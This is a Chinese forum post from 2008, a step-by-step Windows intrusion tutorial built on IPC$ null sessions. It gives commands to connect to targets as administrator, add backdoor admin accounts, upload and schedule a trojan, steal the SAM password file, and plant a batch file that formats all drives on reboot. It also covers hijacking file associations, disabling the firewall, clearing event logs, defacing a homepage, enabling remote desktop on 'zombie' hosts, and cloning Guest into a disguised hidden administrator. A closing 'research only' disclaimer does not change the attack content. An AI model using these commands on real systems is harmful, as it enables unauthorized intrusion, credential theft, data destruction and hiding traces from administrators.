Winmillion
新手上路
积分 16
发帖 4
注册 2008-8-2
来自 China
状态 离线
|
『楼 主』:
[推荐]入侵命令大全
一、IPC$连接↓
在桌面开始→运行输入:cmd
连接目标↓
net use \\XXX.XXX.XXX.XXX\IPC$ "" /user:"administrator"
这里让我来给大家解释一下:如果显示“命令成功”证明与对方连接成功!""意思是空密码.
错误号5 “意思是拒绝访问很可能你使用的用户不是管理员权限的先提升权限”
错误号51 “意思是Windows无法找到网络路径网络有问题”
错误号53 “意思是找不到网络路径IP地址错误目标未开机目标lanmanserver服务未启动目标有防火墙(端口过滤)”
错误号67 “意思是找不到网络名你的lanmanworkstation服务未启动目标删除了IPC$”
错误号1219 “意思是提供的凭据与已存在的凭据集冲突你已经和对方建立了一个IPC$意思是请删除再连”
错误号1326 “意思是未知的用户名或错误密码原因很明显了”
错误号1792 “意思是试图登录意思是但是网络登录服务没有启动目标NetLogon服务未启动.(连接域控会出现此情况)”
错误号2242 “意思是此用户的密码已经过期目标有帐号策略意思是强制定期要求更改密码”
(注意以下的操作您必须连接成功才可以使用)
创建用户↓
net user Hacker 123456 /add
这里让我来给大家解释一下:123456是密码.
删除用户↓
net user Hacker /del
用户升级为管理员权限↓
net localgroup administrators QQ605693089 /add
激活Guest↓
net user Guest /active:yes
禁止Guest↓
net user Guest /active:no
创建Guest密码↓
net user Guest 123456
上传到对方的C盘目录(XP系统)↓
Copy d:\muma.exe \\XXX.XXX.XXX.XXX\C$
上传到对方的C:\WINDOWS\system32\(XP系统)↓
Copy d:\muma.exe \\XXX.XXX.XXX.XXX\C$"\WINDOWS\system32\"(注意:路径长就要在后面加上"")
上传到对方的C:\WINNT目录里(WinNT/Win2000系统)↓
Copy d:\muma.exe \\XXX.XXX.XXX.XXX\admin$ (注意:admin$意思是上传到WinNT目录里)
上传到对方的C:\WINNT\system32\(WinNT/Win2000系统)↓
Copy d:\muma.exe \\XXX.XXX.XXX.XXX\admin$"\system32\"(注意:路径长就要在后面加上"")
下载↓
Copy \\XXX.XXX.XXX.XXX\admin$\system32\config\SAM F:\
如果对方设置密码,就下载C:\WinNT\system32\config\SAM到本地破解.
查看对方时间↓
net time \\XXX.XXX.XXX.XXX
新建一个作业↓
at \\XXX.XXX.XXX.XXX 12:00 c:\muma.exe
启动“计划”服务使计算机可以使用at命令在指定时间启动程序,必须开schedule服务.
启动schedule服务↓
net start schedule
查看远程计算机上的全部计划作业↓
at \\XXX.XXX.XXX.XXX
取消远程计算机上的第1个计划作业↓(1是代表第一个作业)
at \\XXX.XXX.XXX.XXX 1 /del
取消远程计算机上的全部计划作业↓
at \\XXX.XXX.XXX.XXX all /del
再次查看对方时间↓
net time \\XXX.XXX.XXX.XXX
如果对方的时间已经超过12:00,比如12:01表示木马已成功运行!
把本机的时间和对方的时间一样↓
net time \\XXX.XXX.XXX.XXX /set
定时重启↓
at 12:00 ShutDown -t 0 -r
这里让我来给大家解释一下:该命令运行后,到了21:00点,电脑会出现“系统关机”对话框,并30秒延时自动重启.如果不想延时时间,可以把“-T 30”去掉即可.
-R是重启,到12点自动重启
-S是关机
-L是注销
-A是取消
-C是消息内容,不能超过127个字
局域网发送命令(指定IP)↓
Net send XXX.XXX.XXX.XXX 你好!
局域网发送命令(局域网内全部IP)↓
Net send /domain XXX.XXX.XXX.XXX 你们好!
定时提醒↓
命令:at 12:00 net Send XXX.XXX.XXX.XXX 你好!
Net Send是Windows内部程序,可以发送消息到网络上的其他用户、计算机.这个功能在Windows中也称作“信使服务”.
定时自动运行批量处理文件↓
命令:at 12:00AM /Every:day 1.bat
day是“天”的意思,是指每天早上12:00点,电脑定时启动1.bat批处理文件.如果想每个星期六运行,把day该成Saturday即可.
如果你觉得还不够爽,弄个明天定时格式化批量处理文件)代码如下↓
-----------------
@format d: /q/u/y
@format e: /q/u/y
@format f: /q/u/y
-----------------
如果有其他盘依次类推.
@是隐藏路径的意思,format是Windows内部程序,/q是快速格式化,/u是一但删除无法还原(这个命令很危险),/y是同意的意思.
AUTOEXEC.BAT这个批量处理文件不用我多说了吧!它是隐藏在系统盘的目录下开机时都要运行这个批量处理文件,把以上格式化批量处理文件的代码复制进去,等对方重启后,什么东西也没了,即时保存后再重启也一样……
Telnet服务↓
net start Telnet
如果对方没有禁止Telnet,那就帮它启动.
启动远程Telnet↓
netsvc \\XXX.XXX.XXX.XXX Telnet /start
start是启动命令、stop是停止、pause是暂停、continue是恢复.
Tlntadmn comfig port=55 //修改Telnet端口为55
连接对方的Telnet服务↓
Telnet XXX.XXX.XXX.XXX
登录时一般要用户和密码,如果登录成功了想干什么就干什么……
登录成功后,还要懂一些DOS命令.
强制终止进程↓
ntsd -c q -p 进程的PID
恢复exe文件关联↓
Ftype exefile="%1" %*
修改txt文件关联↓
Assoc .txt=%systemroot%\muma.exe
劫持txt文件关联↓
Ftype txtfile=木马路径.exe
木马程序替换notepad.exe(记事本)↓
ren c:\muma.exe notepad.exe
Replace c:\notepad.exe c:\WINDOWS\
查看所有端口和PID↓
netstat -ano -p tcp
ARP -a↓
在网上邻居隐藏本机↓
net config 你的计算机名 /hidden:yes
查看C盘共享的文本文件↓
net share >c:\1.txt
查看系统启动时间↓
systeminfo
CD打开指定路径↓
CD C:\WINNT\SYSTEM32\
D:打开D盘↓
D:
新建文件夹↓
MD C:\123
删除文件夹(注意:空的才可以)↓
RD C:\123
查看当前系统目录↓
DIR
显示或设置日期↓
DATE
显示或设置时间↓
TIME
查看其他目录↓
DIR D:\
移动C盘文件夹里的文件到D盘↓
MOVE C:\*.EXE D:\
此命令可以将C盘下所有扩展名为EXE的文件移动到D盘
复制C盘文件夹里的文件到D盘↓
Copy C:\123\muma.exe D:\
复制C盘文件夹里的全部文件到D盘的123文件夹里↓
Copy C:\123\*.* D:\123\
注意:D盘里一定要有123文件夹,否则复制不成功.
不管有没有文件夹都会自动新建一个↓
XCopy C:\123\*.* D:\123\/s/e
在C盘下把文件设为只读属性↓
attrib +r muma.exe
+是钩选,-是取消.
+h是隐藏
+a是存储
+s是系统
如果设为attrib +h +s muma.exe
意思是:隐藏无法运行.
删除指定的文件(ERASE也可以)↓
del C:\Windows\system32\muma.exe
删除指定的扩展名文件↓
del C:\Windows\system32\*.log
这里让我来给大家解释一下:*.log是指全部扩展名为log的文件.
删除全部文件↓
del C:\Windows\system32\*.*
强制终止QQ进程↓
taskkill /f /im qq.exe /t
把TXT与JPG合并↓
Copy c:\1.jpg/b+ d:\2.txt/a 3.jpg
用笔记本方式打开3.jpg最下面就是2.txt的文字了。
C盘转换为NTFS格式↓
convert c:/fs:ntfs
给盘添加卷标↓
label c:系统盘
label d:软件
C盘目录↓
%systemdrive%
C:\WINDOWS目录↓
%windir%
C:\Documents and Settings\Administrator\目录↓
%userprofile%
echo 你的主页已被黑! >index.html //在当前目录下建index.html 如在C盘下建echo 你的主页已被黑! >c:\index.html
echo 嘿嘿! >>c:\index.html //追加
echo format d: /q/y >c:\1.bat //在C盘下建一个批处理
清屏↓
cls
打开net use↓
net start lanmanserver
启动Server服务(IPC$和共享要靠这个服务)↓
net start Server
启动Messenger信使服务↓
net start Messenger
与对方创建共享并映射驱动器到本地z盘↓
net use z: \\192.168.0.1\C$ "" /user:"administrator"
删除映射的C盘↓
net use z: /del
删除全部↓
net use * /del /Y
查看对方系统类型↓
type C:\boot.ini
查看对方机子IP↓
IPConfig /all
关闭Windows自带的防火墙两条命令其中任意一条↓
net stop sharedaccess
netsh firewall set opmode disable
启用Windows自带的防火墙两条命令其中任意一条↓
net start sharedaccess
netsh firewall set opmode enable
查看谁连接过↓
net session
清除日记↓
清除应用日记C:\WINNT\system32\config\appevent.log
清除系统日记C:\WINNT\system32\config\sysevent.log
清除安全日记C:\WINNT\system32\config\secevent.log
关闭“事件日志”服务↓(该服务将事件记录在本地计算机上)
net stop Eventlog
远程重启↓
Shutdown \\XXX.XXX.XXX.XXX 12:00 /r (/f是强制重启,/r是普通重启)
断开连接↓
net use \\XXX.XXX.XXX.XXX\IPC$ /del
二、在命令下开3389↓
cscript rots.vbe XXX.XXX.XXX.XXX. administrator "" 8008 /fr
后面的8008端口是要更改终端的端口,你可以任意设置终端的端口,/fr是强制重启,/r是普通重启.
因为终端服务器只在Win2000 server以上的版本(包括server)才有.
等对方强制重启完后,就可以用Ping,Ping它,看对方是否在线.ping XXX.XXX.XXX.XXX.如果Ping到对方在线,那就快点用“远程桌面连接工具”连接终端吧!
Win2000/NT批量处理文件开3389↓
打开记事本,编辑内容如下↓
echo (Components) > C:\sql
echo TSEnable = on >> C:\sql
sysocmgr /i:C:\WinNT\inf\sysoc.inf /u:C:\sql /q
编辑好后保存,把扩展名该为BAT,上传到肉鸡里执行,这里值得注意的是要确定系统目录是否在C盘,如果在其他盘则需要改动。
WinXP批量处理文件开3389↓
echo REGEDIT4>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
编辑好后保存,把扩展名该为BAT,上传到肉鸡里执行即可。
三、在图形界面下把禁用的Guest克隆成隐身管理员+伪装↓
1、首先用超级用户administrator登录到Win2000的3389肉鸡.
2、在“开始”→“运行”中输入:regedt32.exe回车.
3、Windows NT/2000的用户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户“SYSTEM”外,其它用户都无权查看里面的信使,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限.这样就可以对SAM键内的信息进行读写了.点击“安全”“权限”,将administrator设置为“完全控制”然后退出注册表.(注意:如果是在XP下直接打开regedit即可)
4、在“开始”→“运行”里输入:regedit.exe回车.
5、administrator的值:
“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000000001F4”
6、Guest的值:
“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000000001F5”
7、注意:先导出:“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000000001F4”和“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000000001F5”的值进行备份,不要备份整个注册表,本人已经测试过把整个注册表导入,结果不成功.
8、备份完后将00000000001F4、00000000001F5、项导出,用记事本打开000001F4和000001F5,把000001F4的“F”的值,复制到000001F5的“F”的值里保存.然后将00000000001F5导入.
9、给Guest创建密码:123456↓
net user Guest 123456
注意:在DOS里是更改不了Guest的密码,打开“计算机管理”下右击Guest把“用户不能更改密码”的钩去掉(去不去掉都可以更改密码).然后再右击Guest选择“所以任务”选择“设置密码”即可.
现在注销一下用Guest登录.
打开“计算机管理”下看到的Guest这个用户已经是禁止的,这只不过是伪装而已,用鼠标右击“Guest”选择“属性”这里可以看到“帐号已停用”没打上勾,等重启后再打开“计算机管理”Guest会变成激活状态.但是在登录的时候是不会显示Guest用户,因为它在“用户帐号”里没有启动.克隆Guest隐身管理员已经建立好了.
四、伪装用户↓
10、伪装一下Guest用户达到欺骗肉鸡,在“计算机管理”下有些用户名是禁止的,随便选一个(最好是长的英文名)
右击选择“重命名”复制一下.然后右击Guest选择“重命名”将刚才复制的粘贴进去,注意:这里随便把一个英文改掉.在空白处右击选择“新用户”用户名为“Guest”全名不用添加,只添加“描述”,这里把刚才已改名的Guest里的“描述”复制过来即可.把刚才新建的“Guest”用户右击选择“属性”把“全名”去掉,把“用户下次登录时须更改密码”的钩去掉,然后钩上“用户不能更改密码”和“密码永不过期”和“帐户已停用”单击“确定”.
最后将刚才“已改名”的Guest修改一下“全名”和“描述”,这里只要将刚才“复制的那个英文名用户”里的“全名”和“描述”粘贴过来即可.当肉鸡在“计算机管理”下看到的Guest用户是禁止的,其实它是普通用户.真正的Guest用户没有被禁止,当用户想删除真正的Guest是删除不了的.只有“禁止该用户”伪装Guest用户已经建立好了.注意:当你伪装了Guest用户,不要把用户名给忘了哦!伪装用户已经建立好了.
教程就到此结束!注意:凡看过本教程只可用来研究,再次强调一下不可用来入侵他人主机,要做个有道德者!
|
Delphi研发小组 QQ群:58846602
C语言程序设计 QQ群:4124972 |
|
